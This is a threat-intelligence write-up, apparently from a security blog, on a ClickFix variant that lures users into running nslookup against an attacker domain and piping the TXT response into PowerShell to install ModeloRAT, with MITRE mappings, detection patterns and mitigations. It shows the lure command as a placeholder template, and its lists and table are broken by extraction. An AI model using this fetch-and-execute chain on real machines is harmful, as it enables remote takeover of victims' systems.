Microsoft Threat Intelligence has reported on a novel evolution of the ClickFix social engineering technique. This new campaign tricks users into executing a malicious nslookup command, which leverages the Domain Name System (DNS) as a stealthy delivery mechanism for a PowerShell payload. This method helps attackers evade traditional web-based detection and has been observed deploying ModeloRAT, a Python-based remote access trojan (RAT). The technique highlights threat actors' ongoing innovation in abusing legitimate system tools and fundamental network protocols for malicious purposes.
The ClickFix technique is a form of social engineering where users are presented with a fake error message or prompt, instructing them to copy and paste a command into the Windows Run dialog or Command Prompt to "fix" a non-existent issue.
This new variant weaponizes the nslookup utility. The attack proceeds as follows:
nslookup -query=txt <attacker-controlled-domain>. The command is crafted to look innocuous.Name: field or TXT record of the DNS response.| iex), causing the malicious script to run on the victim's machine.This attack chain demonstrates several defense evasion and execution techniques:
T1204.002 - Malicious File: The attack relies on the user being tricked into executing the initial command.T1071.004 - Application Layer Protocol: DNS: The core of the technique is using DNS as a channel for C2 communications and payload delivery, which can be harder to inspect than HTTP/S traffic.T1059.001 - PowerShell: PowerShell is used as the initial execution engine on the victim's machine to decode and run the payload received via DNS.T1574.002 - DLL Side-Loading: While not explicitly stated, the use of a ZIP archive with multiple components is often a precursor to side-loading or other multi-stage execution flows.T1105 - Ingress Tool Transfer: The PowerShell script is used to download the next stage (ZIP archive) from an external source.Successful execution of this attack leads to a full system compromise via the ModeloRAT trojan. The impact can include:
| Type | Value | Description |
|---|---|---|
| command_line_pattern | nslookup - |
Monitor for command-line execution of nslookup with specific server arguments or unusual query types, especially when piped to another process. |
| log_source | Windows Event ID 4688 |
Enable process creation logging to detect nslookup.exe being launched with suspicious parameters. |
| network_traffic_pattern | Large DNS Responses |
Unusually large DNS responses, especially for TXT records, can indicate data exfiltration or payload delivery. |
| command_line_pattern | powershell -enc or ` |
iex` |
nslookup.exe being used with non-standard parameters or its output being piped to an interpreter like powershell.exe. Reference D3FEND technique D3-PA - Process Analysis.D3-NTA - Network Traffic Analysis.D3-EAL - Executable Allowlisting.D3-DNSDL - DNS Denylisting.Training users to identify social engineering and not to run commands from untrusted sources is a key preventative control.
Implementing DNS filtering/firewall solutions can block the initial query to the attacker's malicious domain.
Using application control to restrict PowerShell execution or enabling Constrained Language Mode can prevent the payload from running.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats